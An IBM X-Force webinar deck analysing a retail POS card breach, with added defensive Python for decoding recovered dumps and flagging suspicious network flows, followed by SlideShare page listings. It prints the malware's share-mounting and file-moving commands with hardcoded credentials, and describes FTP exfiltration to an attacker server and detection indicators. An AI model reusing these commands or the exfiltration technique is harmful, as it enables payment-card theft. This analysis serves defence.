IBM Security Systems

Anatomy of an Advanced
Retail Breach
Chris Poulin
Research Strategist, X-Force

February 2014

© 2014 IBM Corporation

Agenda

• About the IBM X-Force
• Dissection of a retail attack and data breach
• Solutions to prevent similar compromises

Note: Information provided by IBM in this webinar and the associated blog entry is derived from
research by the author and/or the IBM X-Force, and is based on publicly available sources. No
information was obtained by, or otherwise derived from, any confidential information shared with IBM.


X-Force is the foundation for advanced security and threat research
across the IBM Security Framework

The mission of X-Force is to:
• Monitor and evaluate the rapidly changing threat landscape
• Research new attack techniques and develop protection for tomorrow's security challenges
• Educate our customers and the general public


Collaborative IBM teams monitor and analyze
the changing threat landscape

[Infographic; figures recovered from the slide]

Coverage:
• 20,000+ devices under contract
• 3,700+ managed clients worldwide
• 15B+ events managed per day
• 133 monitored countries (MSS)
• 1,000+ security related patents

Depth:
• 17B analyzed web pages & images
• 40M spam & phishing attacks
• 73K documented vulnerabilities
• Billions of intrusion attempts daily
• Millions of unique malware samples

Anatomy of the Breach

[Attack-flow diagram; steps and components recovered from the slide]

1.  Attacker phishes a 3rd party contractor
2.  Attacker uses stolen credentials to access contractor portals
3a. Attacker finds & infects internal Windows file server
3b. Attacker finds & infects POS systems w/malware
4.  Malware scrapes RAM for clear text CC stripe data
5.  Malware sends CC data to internal server; sends custom ping to notify
6.  Stolen data is exfiltrated to FTP servers

Diagram components: contractor portals; firewall; internal network containing the retailer POS
systems and the retailer Windows file server; attacker FTP servers (external/Russia)
© 2014 IBM Corporation
IBM Security Systems

1. Phish a 3rd Party Contractor

Attacker phishes a 3rd party contractor.

• HVAC firm in PA
• Email malware campaign
• Citadel password stealing bot, variant of Zeus banking trojan
• Primary method of malware detection: free version of Malwarebytes Anti-Malware
  – On-demand scanning; not for commercial use
• Supplier portal contains lots of public information
  – Example: list of resources for HVAC companies


2. Access & exploit contractor portal

Attacker uses stolen credentials to access contractor portal.

Contractors generally not required to use token or other 2-factor authentication.

Portal hosts shown on the slide:
• service.ariba.com, 216.109.104.11, NS @ ariba.com
• amlogin.ewips.partnersonline.com, 161.225.202.98, NS @ retailer.com
• pdzone.retailer.com, 61.225.130.104, NS @ retailer.com


3a. Discover & exploit internal file server

Attacker finds & infects internal Windows file server.

• Exact method of movement from portal to internal server unknown
• Probably not HVAC partner—cloud-based, not on retailer extranet
• Back-end connect from partner portal or other retailer owned asset?
• SQL injection, browser exploit, open ingress port, who knows?
• Or maybe contractors had access to internal network to monitor HVAC systems remotely


3a. Discover & exploit internal file server (cont'd)

• Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata
  – Created by username John.Doe
  – Printed recently on Windows DOMAIN
• Google search easily reveals location of retail datacenters
• Malware to accumulate stolen card data and exfiltrate regularly (may have been 2 separate servers)
  – Username="Best1_user"; password="BackupU$r"
  – Same username is installed with BMC Software Performance Assurance for Microsoft Server;
    password is not generated by BMC
  – Installed as "BladeLogic", hiding as BMC component, BladeLogic Automation Suite;
    however, BMC doesn't name any component "bladelogic.exe"
  – System / Administrator level account; can run batch jobs


3b. Find & infect POS systems

With a point of presence on an internal server, it's all unicorns and rainbows from here.

[Image: "Evil unicorns"; source: http://bigsnarf.wordpress.com/2013/03/10/using-mapreduce-for-fraud-detection-and-prevention/]

Attacker finds & infects POS systems w/malware. Diagram components: retailer POS systems,
retailer Windows file server.


4. Malware scrapes card data from RAM

Malware scrapes RAM for clear text CC stripe data on the retailer POS systems.

• Trojan.POSRAM, variant of BlackPOS
• No anti-virus solution had a signature for the malware at the time of the attack,
  or at the time of disclosure
• Looks for "pos.exe" process
• Installs trojan, creates registry entries containing string "POSWDS"
• Scrapes RAM for track 1 and track 2 data of financial cards
• Card track data is encrypted
  – between the reader and POS, and
  – again between the POS and payment processor
• Unencrypted momentarily at the POS as the transaction is cleared
• Debit card PINs are hashed at the card reader
• Chip-and-PIN encrypts the transaction from the card to processor
• Stores stolen card data in file %SystemRoot%\system32\winxml.dll


5. Harvested card data is sent to internal rally point

Malware sends CC data from the retailer POS systems to an internal server (the retailer Windows
file server); sends custom ping to notify.

• Moves stolen card data to a central collection point
• Assumes POS systems have no internet access
• Creates temp Windows share on domain
• Malware on rally point creates share in %windir%\twain_32
• Encodes base64, with encoding string
  JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau
• Moves winxml.dll to <RallyPoint>_<Day>_<Mon>_<Hr>.txt
• POS malware sends custom ICMP to the rally point as a semaphore

Commands run on the infected POS, as shown on the slide:

    net use S: \\<HardCodedIP>\c$\WINDOWS\twain_32 /user:Best1_user BackupU$r
    move %windir%\system32\winxml.dll S:\<InfectedMachineName>_<Day>_<Month>_<Hour>.txt
    net use S: /del
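The custom-alphabet base64 described on this slide is a plain substitution over the standard alphabet, so a responder who recovers one of the dump files from the rally point can map it back and decode it with a stock library, then pull out the card records for impact analysis. The Python below is an added example and is not code from the slides or from IBM; it uses the encoding string quoted on the slide, and the sample dump it decodes is constructed here from published test card numbers, not data from the breach. The track-2 regex is a simplified form of the ISO 7813 layout and is an assumption of the example.

```python
import base64
import re

# Encoding string quoted on the slide: a permutation of the standard base64 alphabet.
CUSTOM_ALPHABET = "JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau"
STANDARD_ALPHABET = (
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
)
assert len(CUSTOM_ALPHABET) == 64 and len(set(CUSTOM_ALPHABET)) == 64

_TO_STANDARD = str.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET)
_TO_CUSTOM = str.maketrans(STANDARD_ALPHABET, CUSTOM_ALPHABET)

# Simplified ISO 7813 track-2 layout (assumed): ;PAN=YYMM<service code><discretionary>?
TRACK2_RE = re.compile(rb";?(\d{13,19}=\d{4,})\??")


def decode_custom_b64(text: str) -> bytes:
    """Map the custom alphabet back onto the standard one, then decode normally.

    Whitespace between lines is dropped; '=' padding is not in either alphabet and
    passes through unchanged. validate=True makes any character outside the
    alphabet raise, which is what you want when sifting recovered files: a file
    that does not decode cleanly is not a dump in this format.
    """
    cleaned = "".join(text.split())
    return base64.b64decode(cleaned.translate(_TO_STANDARD), validate=True)


def encode_custom_b64(data: bytes) -> str:
    """Inverse mapping; used here only to build the constructed sample dump."""
    return base64.b64encode(data).decode("ascii").translate(_TO_CUSTOM)


def extract_track2(dump: bytes) -> list:
    """Return the track-2 records (PAN=expiry...) found in a decoded dump."""
    return [m.decode("ascii") for m in TRACK2_RE.findall(dump)]


# Constructed sample: two records built from published test card numbers.
SAMPLE_DUMP = (
    b";4111111111111111=2512101000000000?\r\n"
    b";5555555555554444=2611101000000000?\r\n"
)
SAMPLE_ENCODED = encode_custom_b64(SAMPLE_DUMP)


def demo() -> list:
    """Decode the constructed sample and list the card records it contains."""
    return extract_track2(decode_custom_b64(SAMPLE_ENCODED))


if __name__ == "__main__":
    for record in demo():
        print(record)
```

Because the mapping is a fixed permutation, the same decoder works on any file the rally-point malware wrote with this alphabet; a file that fails `validate=True` was either not produced by it or was truncated in transit.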


6. Card data is exfiltrated to FTP servers in Russia

• Compiles all card dumps into c:\windows\twain_32\a.dll
• Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin
• Generates an FTP script and executes ftp -s <path>\cmd.txt

Stolen data is exfiltrated from the retailer Windows file server to the attacker FTP servers
(external/Russia).

Protect endpoints

• The ultimate prize:
  – POS systems: where the card data is processed
  – File servers: base of operations
  – Web servers: initial incursion vector
  – Contractor workstations: intelligence, credentials
• Malware protection:
  – Contractor workstations (phishing, Citadel bot)
  – POS systems: RAM scraper trojan
  – File servers: data management and exfiltration tools
  – Application isolation (Intel SGX; micro-virtualization, etc) to prevent RAM scraping
• Patch
• Configuration management


Protection against web and file server compromises

• Secure development lifecycle (SDLC)
  – Secure coding practices training
  – Static/source code analysis: manual (code review) and automated
  – Dynamic code analysis (esp. low hanging fruit: SQL injection & XSS)
  – Include compiled applications, web applications, mobile apps
• Go-live security process
  – Harden system (reduce footprint/services, suppress excess information, harden apps,
    change usernames / passwords)
  – Install appropriate endpoint protection and configuration management
  – Vulnerability scan
• Appropriate authentication
  – Separate domains / administrative credentials (identity separation)
  – Multi-factor authentication


Segment critical assets

[Image source: http://nationalgeographic.com]

• Enumerate & classify
• Restrict web assets' access to internal systems
• Isolate public / partner facing assets from private assets
• Segment operational technology (OT), critical assets, and general IT
• Perform firewall rule analysis, paying special attention to:
  – assets containing sensitive data, such as cardholder information
  – risky protocols and flow directions
• For example, POS systems shouldn't
  – mount Windows shares, or
  – send regular ICMP packets


Monitor & detect: network

• Network activity pattern monitoring can detect:
  – Suspicious scanning activity as attacker maps out the network landscape
  – Policy violations for outbound FTP, especially to Eastern Bloc countries
• Network packet inspection can detect:
  – IPS can stop SQL injection, XSS, other more advanced attacks
  – Credit card number patterns in outbound data
  – Suspect strings in ICMP packets
  – Identify network traffic that is not what it seems: e.g.,
    • Non-DNS protocol over port 53
    • IRC over port 80


Monitor & detect: vulnerability and anomaly detection

• Vulnerability scanning, including deep endpoint assessment
  – example: registry entries containing "POSWDS"
• Anomaly detection
  – Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access)
  – Detect deviations from baseline:
    • POS connecting to Windows shares
    • POS emitting ICMP packets
  – General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP
  – Profile ICMP packet sizes, normal payload contents; identify & block deviations
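The checks from the segmentation and monitoring slides (a POS system mounting a Windows share or emitting ICMP, outbound FTP, ICMP packets far larger than the profiled baseline, card numbers in outbound data) reduce to a few rules over flow records, with a Luhn check to keep "credit card number pattern" alerts from firing on every long digit string. The Python below is an added example, not IBM's or any product's code: it runs those rules over a few constructed flow lines. The POS subnet, the internal address range, the ICMP size baseline and the six-field record format are all assumptions of the example; the external address is from the TEST-NET-3 documentation range.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample flow records (not data from the breach): one flow per line,
# fields: src_ip dst_ip proto dst_port bytes payload_snippet
SAMPLE_FLOWS = """\
10.20.1.15 10.20.1.16 tcp 8443 1200 -
10.20.1.15 10.50.0.9 tcp 445 98304 -
10.20.1.15 10.50.0.9 icmp 0 1400 JN8hdEe3P0cUMTs5
10.20.1.16 10.50.0.9 icmp 0 64 abcdefghijklmnop
10.50.0.9 203.0.113.5 tcp 21 2048000 -
10.30.5.2 10.50.0.9 tcp 445 4096 -
10.50.0.9 203.0.113.5 tcp 443 5120 4111111111111111=2512101
"""

# Assumed segmentation for the example: the POS segment and the internal address space.
POS_SEGMENT = ip_network("10.20.1.0/24")
INTERNAL = ip_network("10.0.0.0/8")
SMB_PORTS = {139, 445}
FTP_PORTS = {20, 21}
ICMP_BASELINE_BYTES = 64      # profiled "normal" echo size; assumed for the example
PAN_RE = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum used by payment card numbers; cuts regex false positives."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def contains_pan(payload: str) -> bool:
    """True if the payload holds a 13-19 digit run that passes Luhn."""
    return any(luhn_ok(m) for m in PAN_RE.findall(payload))


def analyze_flows(text: str) -> list:
    """Apply the deck's policy and anomaly checks to each flow.

    Returns (rule, src, dst) tuples in the order the flows were seen.
    """
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, dst, proto, port, nbytes, payload = line.split(maxsplit=5)
        src_ip, dst_ip = ip_address(src), ip_address(dst)
        port, nbytes = int(port), int(nbytes)
        from_pos = src_ip in POS_SEGMENT
        outbound = dst_ip not in INTERNAL

        if from_pos and proto == "tcp" and port in SMB_PORTS:
            alerts.append(("pos_smb_share", src, dst))      # POS should never mount shares
        if from_pos and proto == "icmp":
            alerts.append(("pos_icmp", src, dst))           # POS should not emit ICMP at all
        if proto == "icmp" and nbytes > 2 * ICMP_BASELINE_BYTES:
            alerts.append(("icmp_size_anomaly", src, dst))  # oversized ping: possible signalling
        if outbound and port in FTP_PORTS:
            alerts.append(("outbound_ftp", src, dst))       # policy violation: outbound FTP
        if outbound and contains_pan(payload):
            alerts.append(("pan_in_outbound", src, dst))    # card number leaving the network
    return alerts


if __name__ == "__main__":
    for rule, src, dst in analyze_flows(SAMPLE_FLOWS):
        print(f"{rule:18s} {src} -> {dst}")
```

Of the seven constructed flows, the ordinary POS-to-POS HTTPS session and the non-POS host reaching an SMB share produce nothing; the POS host that mounts a share, the two POS hosts that ping the file server (one with an oversized payload), the file server's outbound FTP session and the outbound record carrying a Luhn-valid card number each raise the corresponding rule.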


Incident Response

• Speedy and complete forensics
  – early in the process if the compromise is detected before data is stolen, or
  – after a severe breach when accurate impact analysis is critical:
    • Which systems were compromised?
    • How many customers were affected?
    • How much of the data comprised personal information?
• Instrument everything feasible
  – include POS systems and network activity
  – Enrich with context from
    • vulnerability assessment tools
    • change management transactions
    • security intelligence feeds


Incident / emergency response

• Plan should include
  – Detection
  – Response and escalation
  – Engaging law enforcement as appropriate
  – Preservation of evidence
  – Compliance with regulations and contractual agreements
  – Customer and press notification
  – Public relations
• Engage your contracted external emergency response agency in advance
  – Help you prepare for a breach and
  – Gather context about your environment
• Test your process regularly
• Business associate contract and assessment


At IBM, the world is our security lab

[Map of Security Operations Centers, Security Research and Development Labs, and Institute for
Advanced Security Branches]

• More than 6,000 IBM researchers, developers, and subject matter experts ALL focused on security
• 3,000 IBM security patents

Get Engaged with IBM X-Force Research and Development

Follow us at @ibmsecurity and @ibmxforce

Download X-Force security trend & risk reports
http://www.ibm.com/security/xforce/

Subscribe to X-Force alerts at iss.net/rss.php
or IBM Security blog at www.securityintelligence.com

Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response
to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated
or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure
and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to
be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems,
products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE
MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.

www.ibm.com/security

© Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes
only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use
of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any
warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement
governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in
all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole
discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any
way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United
States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.

Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
Meet the New IBM i2 QRadar Offense Investigator App and Start Threat Hunting ...
 
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
Understanding the Impact of Today's Security Breaches: The 2017 Ponemon Cost ...
 
WannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do NowWannaCry Ransomware Attack: What to Do Now
WannaCry Ransomware Attack: What to Do Now
 
How to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security OperationsHow to Improve Threat Detection & Simplify Security Operations
How to Improve Threat Detection & Simplify Security Operations
 
IBM QRadar UBA
IBM QRadar UBA IBM QRadar UBA
IBM QRadar UBA
 
Mobile Vision 2020
Mobile Vision 2020Mobile Vision 2020
Mobile Vision 2020
 
Retail Mobility, Productivity and Security
Retail Mobility, Productivity and SecurityRetail Mobility, Productivity and Security
Retail Mobility, Productivity and Security
 
Close the Loop on Incident Response
Close the Loop on Incident ResponseClose the Loop on Incident Response
Close the Loop on Incident Response
 
Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats
 

Recently uploaded

Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Aggregage
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
RinaMondal9
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
Neo4j
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
DianaGray10
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
Dorra BARTAGUIZ
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
mikeeftimakis1
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
Quotidiano Piemontese
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 

Recently uploaded (20)

Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024GraphSummit Singapore | The Art of the  Possible with Graph - Q2 2024
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5UiPath Test Automation using UiPath Test Suite series, part 5
UiPath Test Automation using UiPath Test Suite series, part 5
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 

Anatomy of an Advanced Retail Breach

  • 1. IBM Security Systems
    Anatomy of an Advanced Retail Breach
    Chris Poulin, Research Strategist, X-Force
    February 2014
    © 2014 IBM Corporation
  • 2. Agenda
     About the IBM X-Force
     Dissection of a retail attack and data breach
     Solutions to prevent similar compromises
    Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM.
  • 3. X-Force is the foundation for advanced security and threat research across the IBM Security Framework
    The mission of X-Force is to:
     Monitor and evaluate the rapidly changing threat landscape
     Research new attack techniques and develop protection for tomorrow's security challenges
     Educate our customers and the general public
  • 4. Collaborative IBM teams monitor and analyze the changing threat landscape
    Coverage:
     20,000+ devices under contract
     3,700+ managed clients worldwide
     15B+ events managed per day
     133 monitored countries (MSS)
     1,000+ security related patents
    Depth:
     17B analyzed web pages & images
     40M spam & phishing attacks
     73K documented vulnerabilities
     Billions of intrusion attempts daily
     Millions of unique malware samples
  • 5. Anatomy of the Breach
    [Diagram: attacker; contractor portals; firewall; retailer internal network with Windows file server and POS systems; attacker FTP servers (external/Russia)]
    1. Attacker phishes a 3rd party contractor
    2. Attacker uses stolen credentials to access contractor portals
    3a. Attacker finds & infects internal Windows file server
    3b. Attacker finds & infects POS systems w/malware
    4. Malware scrapes RAM for clear text CC stripe data
    5. Malware sends CC data to internal server; sends custom ping to notify
    6. Stolen data is exfiltrated to FTP servers
  • 6. 1. Phish a 3rd Party Contractor
    [Diagram callout 1: Attacker phishes a 3rd party contractor]
     HVAC firm in PA
     Email malware campaign
     Citadel password stealing bot, variant of Zeus banking trojan
     Primary method of malware detection: free version of Malwarebytes Anti-Malware
      – On-demand scanning; not for commercial use
     Supplier portal contains lots of public information
      – Example: list of resources for HVAC companies
  • 7. 2. Access & exploit contractor portal
    [Diagram callout 2: Attacker uses stolen credentials to access contractor portal]
    Contractor portals:
     service.ariba.com, 216.109.104.11, NS @ ariba.com
     amlogin.ewips.partnersonline.com, 161.225.202.98, NS @ retailer.com
     pdzone.retailer.com, 61.225.130.104, NS @ retailer.com
    Contractors generally not required to use token or other 2-factor authentication
  • 8. 3a. Discover & exploit internal file server
    [Diagram callout 3a: Attacker finds & infects internal Windows file server; Retailer Windows file server]
     Exact method of movement from portal to internal server unknown
     Probably not HVAC partner: cloud-based, not on retailer extranet
     Back-end connect from partner portal or other retailer owned asset?
     SQL injection, browser exploit, open ingress port, who knows?
     Or maybe contractors had access to internal network to monitor HVAC systems remotely
  • 9. 3a. Discover & exploit internal file server (cont'd)
    [Diagram callout 3a: Attacker finds & infects internal Windows file server; Retailer Windows file server]
     Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata
      – Created by username John.Doe
      – Printed recently on Windows DOMAIN
     Google search easily reveals location of retail datacenters
     Malware to accumulate stolen card data and exfiltrate regularly (may have been 2 separate servers)
      – Username="Best1_user"; password="BackupU$r"
      – Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC
      – Installed as "BladeLogic", hiding as BMC component, BladeLogic Automation Suite; however, BMC doesn't name any component "bladelogic.exe"
      – System / Administrator level account; can run batch jobs
  • 10. 3b. Find & infect POS systems
    [Diagram callout 3b: Attacker finds & infects POS systems w/malware; Retailer POS systems; Retailer Windows file server]
    With a point of presence on an internal server, it's all unicorns and rainbows from here. Evil unicorns.
    Image source: http://bigsnarf.wordpress.com/2013/03/10/using-mapreduce-for-fraud-detection-and-prevention/
  • 11. 4. Malware scrapes card data from RAM
    [Diagram callout 4: Malware scrapes RAM for clear text CC stripe data; Retailer POS systems]
     Trojan.POSRAM, variant of BlackPOS
     No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure
     Looks for "pos.exe" process
     Installs trojan, creates registry entries containing string "POSWDS"
     Scrapes RAM for track 1 and track 2 data of financial cards
     Card track data is encrypted
      – Between the reader and POS, and
      – again between the POS and payment processor
     Unencrypted momentarily at the POS as the transaction is cleared
     Debit card PINs are hashed at the card reader
